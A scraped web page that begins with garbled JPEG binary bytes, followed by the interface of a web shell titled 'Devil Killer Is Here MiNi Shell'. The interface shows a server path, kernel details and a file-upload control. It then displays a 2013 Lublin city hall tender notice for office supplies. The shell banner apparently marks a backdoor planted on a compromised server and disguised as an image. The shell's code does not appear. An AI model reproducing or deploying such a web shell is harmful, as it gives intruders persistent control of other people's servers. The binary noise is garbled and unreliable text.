JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131219/529264-N-2013.html

<p class="kh_header"><b>Lublin: Dostawa materiałów i urządzeń biurowych na potrzeby Urzędu Miasta Lublin</b><br>
<b>Numer ogłoszenia: 529264 - 2013; data zamieszczenia: 19.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lublin , Pl. Króla Władysława Łokietka 1, 20-109 Lublin, woj. lubelskie, tel. 81 4663000, faks 81 4663001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.lublin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów i urządzeń biurowych na potrzeby Urzędu Miasta Lublin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu oraz wielkości lub zakresu zamówienia:
1.	Blok techniczny, format arkuszy  A3, kolor arkuszy biały, 10 arkuszy w bloku, gram. min. 180 g/m2 - szt. 10
2.	Blok techniczny, format arkuszy  A4, kolor arkuszy biały, 10 arkuszy w bloku, gram. min. 180 g/m2 - szt. 10
3.	Blok z makulatury biały w kratkę, format A5 minimum 100-kartkowy - szt. 347
4.	Blok z makulatury biały w kratkę, format A4, 100 kartowy - szt. 447
5.	Cienkopis z końcówką fibrową oprawioną w metal, różne kolory, grubość linii 0,4 mm, wentylowana skuwka - szt. 4800
6.	Długopis jednorazowy, kolor pisania niebieski, grubość linii pisania: 0,5-0,7 mm - szt. 954
7.	Długopis na sprężynce leżący, z samoprzylepną podstawką, kolor pisania niebieski - szt. 200
8.	Dziurkacz, jednorazowo na minimum 40 kartek o gram. 80 g/m2, wysuwany ogranicznik formatów - szt. 80
9.	Ekierka, różne kąty, między innymi 30 i 45 stopni, dł. jednego z boków 30 cm, skala milimetrowa, wykonana z tworzywa sztucznego, kolor transparentny - szt. 30
10.	Etykiety uniwersalne, samoprzylepne, białe, różne rozmiary etykiet, format arkusza A4 (op. 100 ark.) - op. 120
11.	Fluorescencyjny zakreślacz z tuszem na bazie wody, końcówka ścięta o grubości (+/-5%) 5mm, z możliwością ponownego napełnienia - szt. 850
12.	Folia kolorowa stosowana jako okładka do oprawy dokumentów formatu A4,  (+/-5%) gr. 200 mic, różne kolory, op. min. 100 szt. - op. 3
13.	Folia transparentna stosowana jako okładka do oprawy dokumentów formatu A4 , (+/-5%) gr. 200 mic, op. min. 100 szt. - op. 3
14.	Foliopis niezmywalny do folii i opisu płyt CD, różne kolory, grubość linii S,F,M - szt. 137
15.	Grzbiet do bindowania dokumentów formatu A4,  średnica grzbietu 25 mm, różne kolory (op. 50 szt.), wykonany z tworzywa sztucznego - op. 6
16.	Grzbiet do bindowania dokumentów formatu A4,  średnica grzbietu 12 mm, różne kolory (op. 100 szt.), wykonany z tworzywa sztucznego - op. 6
17.	Grzbiet do bindowania dokumentów formatu A4,  średnica grzbietu 10 mm, różne kolory (op. 100 szt.), wykonany z tworzywa sztucznego - op. 6
18.	Grzbiet do bindowania dokumentów formatu A4,  średnica grzbietu 8 mm, różne kolory (op. 100 szt.), wykonany z tworzywa sztucznego - op. 6
19.	Gumka dwustronna, część biała -do ścierania ołówka i kredek ołówkowych, część niebieska - do atramentu i tuszu kreślarskiego - szt. 477
20.	Gumka specjalistyczna do usuwania śladów ołówka, biała,wykonana z tworzywa sztucznego, może być stosowana do każdego rodzaju papieru, nie narusza struktury papieru, wym. min. 35,0 mm x 16,0 mm x 11,5 mm - szt. 130
21.	Gumki recepturki, różne kolory (op. po 1 kg) - op. 6
22.	Identyfikator, wykonany z przezroczystego sztywnego tworzywa, z klipsem i agrafką oraz  kartonikiem  z nadrukowaną ramką w komplecie, (+/-5%) wym. 57mm x 90mm, op. min. 50 szt. - op. 30
23.	Kalendarz książkowy na 2015 r., format B5, oprawa twarda zmiękczana gąbką z  obszyciem na krawędziach zewnętrznych,  forma graficzna - w układzie - jeden dzień tygodnia na stronie, z wyjątkiem sobót i niedziel - mogą być razem na jednej stronie - szt. 100
24.	Kalendarz biurowy na 2015 r., na biurko, podłużny, leżący, układ: tydzień na stronie, podział godzinowy dnia pracy, kalendaria skrócone trzech miesięcy na każdej stronie, format:(+/- 5%) 320 mm x 150 mm - szt. 1259
25.	Kalkulator do obliczeń podatkowych, z drukarką dwukolorową, minimum 12 pozycji, wyświetlacz LCD, zasilanie sieciowe, klawisze  typu PC, podwójna pamięć, obliczenia podatkowe, obliczanie marży, funkcja sumy ogólnej - sumuje wszystkie wcześniejsze obliczenia, funkcja zaokrąglania - pozwala wybrać zaokrąglenie wyników obliczeń w górę lub w dół, cofanie ostatnio wprowadzonej pozycji, klawisz podwójnego zera,prędkość druku - min. 2,7 linii/sek. Papier 58 mm. Zasilanie sieciowe. - szt. 5
26.	Kalkulator minimum 12-pozycyjny, automatyczne powtarzanie obliczeń do 100 kroków, podwójne zasilanie, wym. [mm]  (dł. x szer. x wys.) (+/- 5%) 187 x 142 x 35 - szt. 82
27.	Klipy do papieru (+/- 5%) 25mm (op. min. 12 szt.) - op. 122
28.	Klipy do papieru (+/- 5%) 32mm (op. min. 12 szt.) - op. 122
29.	Klipy do papieru (+/-5%) 41mm  (op. min. 12 szt.) - op. 80
30.	Karteczki samoprzylepne, kolor żółty, wymiary: (+/-5%) min. 38 mm x 51 mm (op. -  bloczek min. 100 kartek) - op. 840
31.	Karteczki samoprzylepne, kolor żółty, wymiary: (+/- 5%) min. 75 mmx75 mm (op. -  bloczek min. 100 kartek) - op. 1274
32.	Karton kolorowy, (+/-5%) gram. 250 g/m2, stosowany jako okładka do oprawy dokumentów formatu A4, laminowany folią, błyszczący, różne kolory, op. min. 100 szt. - op. 5
33.	Koperta biała C4 SK, samoklejąca (op. min. 250 szt.) - op. 98
34.	Koperta biała C5 SK, samoklejąca (op. min. 500 szt.) - op. 98
35.	Koperta biała C6 SK, samoklejąca z oknem prawym (op. min. 1000 szt.) - op. 74
36.	Koperta biała C6 SK, samoklejąca, bez okienka (op. min. 1000 szt.) - op. 133
37.	Koperta biała DL / SK, samoklejąca z oknem prawym (op. min. 1000 szt.) - op. 90
38.	Koperta biała DL / SK, samoklejąca, bez okienka (op. min. 1000 szt.) - op. 40
39.	Koperta brązowa B4 HK RBD, samoklejąca z paskiem (op. min. 250 szt.) - op. 3
40.	Koperta brązowa C4 HK RBD, samoklejąca z paskiem (op. min. 250 szt.) - op. 3
41.	Korektor w butelce  z gąbką korygującą (op. min. 20 ml) - op. 460
42.	Korektor w taśmie, taśma o długości min.  8,5 m, szer. (+/- 5%) 4,2 mm - szt. 650
43.	Kostki papierowe do pojemników plastikowych, wymiary (+/-5%) 80 mm x 80 mm x 50 mm, kartki w różnych kolorach, klejone (op. min. 500 karteczek) - op. 700
44.	Kostki papierowe do pojemników plastikowych, wymiary (+/-5%) 80 mm x 80 mm x 50 mm, kartki w różnych kolorach, nieklejone (op. min. 500 karteczek) - op. 300
45.	Koszulka foliowa A4, grubość folii minimum 50 mic., (op. min. 100 szt.) - op. 814
46.	Linijka 30 cm, skala milimetrowa, wykonana z tworzywa sztucznego, kolor transparentny - szt. 65
47.	Listwa do oprawy dokumentów bez użycia bindownicy szer. grzbietu (+/- 5%) 6 mm, do oprawy do 20 arkuszy papieru o formacie A4 i gram. 80 g/m2 z jedną zaokrągloną końcówką, wykonana z tworzywa sztucznego, różne kolory, op. minimum 50 szt. - op. 10
48.	Listwa do oprawy dokumentów bez użycia bindownicy szer. grzbietu (+/- 5%) 9 mm, do oprawy do 50 arkuszy papieru o formacie A4 i gram. 80 g/m2 z jedną zaokrągloną końcówką, wykonana z tworzywa sztucznego, różne kolory, op. minimum 50 szt. - op. 10
49.	Listwa do oprawy dokumentów bez użycia bindownicy szer. grzbietu (+/- 5%) 15 mm, do oprawy do 75 arkuszy papieru o formacie A4 i gram. 80 g/m2 z jedną zaokrągloną końcówką, wykonana z tworzywa sztucznego, różne kolory, op. minimum 50 szt. - op. 10
50.	Marker, różne kolory, ścięta końcówka, szerokość linii pisania 1-5 mm. - szt. 484
51.	Marker z tuszem do flipchartów, różne kolory, okrągła końcówka, grubość linii pisania 1-3 mm - szt. 50
52.	Nici lniane - dratwa, wykonane z lekko skręconych, naturalnych, włókien lnianych, ulegają biodegradacji, opakowanie min. 100 g - szpula - szpula 202
53.	Notatnik akademicki A4, minimum 96 kartowy w kratkę, oprawa twarda - szt. 252
54.	Nożyczki metalowe, rękojeść i ostrze ze stali nierdzewnej, dł. nożyczek minimum 200 mm - szt. 90
55.	Ofertówka transparentna - przeźroczysta A4, minimum 110 mic., (op. min. 25 szt.) - op. 135
56.	Ołówek, drewno cedrowe, twardość HB (op. min.12 szt.) - op. 130
57.	Pojemnik składany na dokumenty formatu  A4, wykonany z PCV, grzbiet (+/-5%) 70 mm, etykiety grzbietowe dwustronne - szt. 200
58.	Rolka barwiąca dwu-kolorowa, kolor wydruku czarny i czerwony, przeznaczona do kalkulatorów typu: Casio: HR-150TECHR-150TERHR-160LBHR-170LBHR-200TECHR-200TERHR-100LCHR-120TFR-2600FR-2650AGYBFR-2650PLUSFR-2650AFR-2650TFR-620TERFR-520GYBFR-520FR-620 TERFR-620TERDR-420TERDR-520TER; Vector:LP-105LP-203TSLP-46TS; Citizen: CX-123/CX-123A/CX-123IICX-126IICX-130CX-131CX-140CX-185CX-32IICX-85CX-85ESCX-88CX-90/CX-91 - szt. 80
59.	Rolka do telefaksu, wym.: szer. 210 mm, dł. 30 m, papier termoczuły o gramaturze 55 g/m2 gwarancja na trwałość wydruku minimum 5 lat - szt. 15
60.	Rolki papieru do systemu numeracyjno - przywołaniowego typu Q Matic, minimum 3000 szt. numerków/biletów w rolce, wym. Rolki 62 mm x 60 mm, każda rolka zapakowana w foliowe opakowanie zabezpieczające przed zawilgoceniem - szt. 80
61.	Rozszywacz biurowy - szt. 195
62.	Segregator z mechanizmem dźwigniowym A4, grzbiet (+/-5%) 50 mm, oklejony na zewnątrz PCV, na dolnych krawędziach metalowe okucia, etykiety grzbietowe dwustronne - szt. 1520
63.	Segregator z mechanizmem dźwigniowym A4, grzbiet (+/- 5%) 75 mm, oklejony na zewnątrz PCV, na dolnych krawędziach metalowe okucia, etykiety grzbietowe dwustronne - szt. 5627
64.	Segregator z mechanizmem dźwigniowym A5, grzbiet (+/-5%) 75 mm, oklejony na zewnątrz PCV, na dolnych krawędziach metalowe okucia, etykiety grzbietowe dwustronne - szt. 70
65.	Skoroszyt A4 wpinany do segregatora, z folii PCV, okładka przednia transparentna, pasek do opisu (op. min 10 szt.) - op. 655
66.	Skoroszyt A4, z folii PCV, okładka przednia transparentna, pasek do opisu (op. min 10 szt.) - op. 220
67.	Skoroszyt A4, zawieszkowy,  zawieszka  pełna, gram. minimum 275 g/m2 (op. min 100 szt.) - op. 55
68.	Skoroszyt A4 biały, gram. min. 250 g/m2, (op. min. 100 szt.) - op. 1300
69.	Sznurek pakowy, jutowy (op. minimum 250 g) - op. 353
70.	Spinacze biurowe do dokumentów, metalowe (+/-5%) 28 mm (op. min. 100 szt.) - op. 1487
71.	Spinacze biurowe do dokumentów, metalowe (+/-5%) 50 mm (op. min. 100 szt.) - op. 407
72.	Szufladki z odpornego na pęknięcia polistyrenu na dokumenty formatu A4, kolor transparentny, możliwość łączenia ze sobą w pionie, miejsca do naklejenia etykiet, co ułatwia organizacje przechowywanych dokumentów - szt. 120
73.	Taśma mleczna, niewidoczna po przyklejeniu, długość min. 33 m, szerokość (+/-5%) 19 mm - szt. 100
74.	Taśma pakowa, mocna, na kleju akrylowym, wymiary: (+/-5%) szer. 48 mm, dł. minimum 50 m, kolor szary lub brązowy - szt. 130
75.	Taśma przezroczysta biurowa pokryta emulsją akrylową, długość min. 20m, szerokość (+/-5%) 19 mm - szt. 380
76.	Taśma montażowa, dwustronnie klejąca, kolor transparentny, na rolce, wymiary(+/-5%): dł. 1,5 m x szer. 19 mm, przeznaczona do trwałego łączenia lub podwieszania różnych elementów w warunkach wewnętrznych w pomieszczeniach, przylepna z obu stron - szt. 50
77.	Teczka do podpisu  na dokumenty o formacie A4, okładki z twardego kartonu pokrytego folią polipropylenową, na przedniej okładce okienko do opisu zawartości książki, minimum 20  przegródek wewnętrznych z otworami do podglądu zawartości,  rozciągliwy grzbiet pozwalający na segregowanie/grupowanie plików min. 10-kartkowych (gram. 80g/m2), kolor bordo - szt. 15
78.	Teczka do podpisu  na dokumenty o formacie A4, okładki z twardego kartonu pokrytego folią polipropylenową, na przedniej okładce okienko do opisu zawartości książki, minimum 20  przegródek wewnętrznych z otworami do podglądu zawartości,  rozciągliwy grzbiet pozwalający na segregowanie/grupowanie plików min. 10-kartkowych (gram. 80g/m2), kolor zielony - szt. 15
79.	Teczka z klipem zamykana, format A4, wewnętrzna kieszeń na dokumenty, klip utrzymujący do 100 kartek, w środku uchwyt na długopis, wykonana z tworzywa PCV i sztywnej tektury - szt. 80
80.	Teczka z gumką, format A4, z tektury dwustronnie barwionej, powlekanej polipropylenem, różne kolory - szt. 1200
81.	Teczka A4 wiązana biała, gram. min. 275g/m2, (op. min 100 szt.) - op. 174
82.	Teczka A4 z gumką, biała, gram. min. 275g/m2, (op. min 100 szt.) - op. 65
83.	Teczka bezkwasowa na dokumenty formatu A4, PH większe od 7, wiązana, wykonana z kartonu jednostronnie bielonego o (+/-5%)  gram. 240 g/m2, wymiary [mm](+/-5%): 320 x 250, grzbiet max 35 mm bigowany co 5 mm - szt. 38850
84.	Temperówka metalowa do ołówków, kredek - szt. 40
85.	Wkład do długopisu typu Zenit, metalowy, dł. linii pisania minimum 6500 m, szer. linii pisania od 0,6 do 0,8 mm, kolory pisania czarny - szt. 200
86.	Wkład do długopisu typu Zenit, metalowy, dł. linii pisania minimum 6500 m, szer. linii pisania od 0,6 do  0,8 mm, kolor pisania niebieski - szt. 2800
87.	Worki papierowe, wymiary (+/-5%) 600 mm x 1000 mm x 220 mm - szt. 2830
88.	Zakładki indeksujące, wymiary (+/-5%): 12 mm x 43 mm, 4 kolory, przezroczyste, z możliwością wielokrotnego przyklejania i odklejania (op. minimum 140 szt.) - op.	520
89.	Zeszyt A5 minimum 96 kartkowy w kratkę - szt. 65
90.	Zeszyt A5 minimum 32 kartkowy w kratkę - szt. 45
91.	Zeszyt A5, minimum 60 kartkowy w kratkę - szt. 45
92.	Zszywacz metalowy, pojemność magazynka minimum 150 zszywek, jednorazowo minimum 20 kartek gram. 80g/m2 - szt. 240
93.	Zszywki 24/6 (op. min. 1000 szt.) - op. 2877.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma wymogu wnoszenia wadium przez wykonawców</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy- w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 2.Oświadczenie o części zamówienia, której wykonanie, wykonawca zamierza powierzyć podwykonawcom w przypadku powierzenia przez wykonawcę części zamówienia podwykonawcom. 3. Wykaz urządzeń i materiałów biurowych 4.Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej). 5.Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumenty składające się na ofertę podpisuje osoba, której umocowanie do reprezentowania wykonawcy nie będzie wynikać z dokumentów załączonych do oferty. 6. W sytuacji, gdy wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 7. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III.4.3), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy:
1)zmiana stawki i kwoty podatku VAT oraz wynagrodzenia brutto 
2.Zmiany umowy przewidziane w pkt. 1 dopuszczalne są na następujących warunkach:
1)Stawka i kwota podatku VAT oraz ceny i wynagrodzenie brutto ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych UM Lublin, Pl. Litewski 1, pok. nr 3, po dokonaniu wpłaty 5,00 zł w budynku UM Lublin ul. Wieniawska 14 lub za zaliczeniem pocztowym (5,00 zł + koszt przesyłki)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.01.2014 godzina 10:30, miejsce: Biuro Zamówień Publicznych UM Lublin, Pl. Litewski 1, pok. nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami upoważnionymi do kontaktowania się z wykonawcami są:
1.W zakresie przedmiotu zamówienia: Antoni Fałkowski - Wydział Organizacji Urzędu w Urzędzie Miasta Lublin, ul. Dolna 3 - go Maja 5, pokój nr 2, telefon 81 466 12 40.
2.W zakresie procedury: p. Małgorzata Kubiczek - Biuro Zamówień Publicznych Urzędu Miasta  Lublin, Plac Litewski 1, pokój nr 3, telefon 81 466 30 13..</p>
